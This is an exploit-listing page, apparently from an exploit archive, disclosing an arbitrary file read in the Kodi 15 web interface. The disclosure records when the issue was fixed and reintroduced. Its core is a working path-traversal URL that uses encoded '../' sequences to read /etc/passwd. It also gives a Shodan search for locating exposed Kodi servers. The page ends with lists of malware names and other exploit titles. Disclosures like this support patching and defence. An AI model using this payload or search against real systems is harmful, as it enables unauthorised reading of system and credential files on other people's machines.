Kodi 15 Arbitrary File Access

Posted on 01 December 2015

# Exploit Title: arbitrary file access kodi web interface # Shodan dork: title:kodi # Date: 25-11-2015 # Contact: https://twitter.com/mpronk89 # Software Link: http://kodi.tv/ # Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305 # Version: v15 # Tested on: linux # CVE : n/a kodi web interface vulnerable to arbitrary file read. example: <ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd for passwd (issue fixed in 2012, reintroduced in february 2015. Fixed again november 2015 for v16)

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Relate Cross Site Scripting
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference

Last 20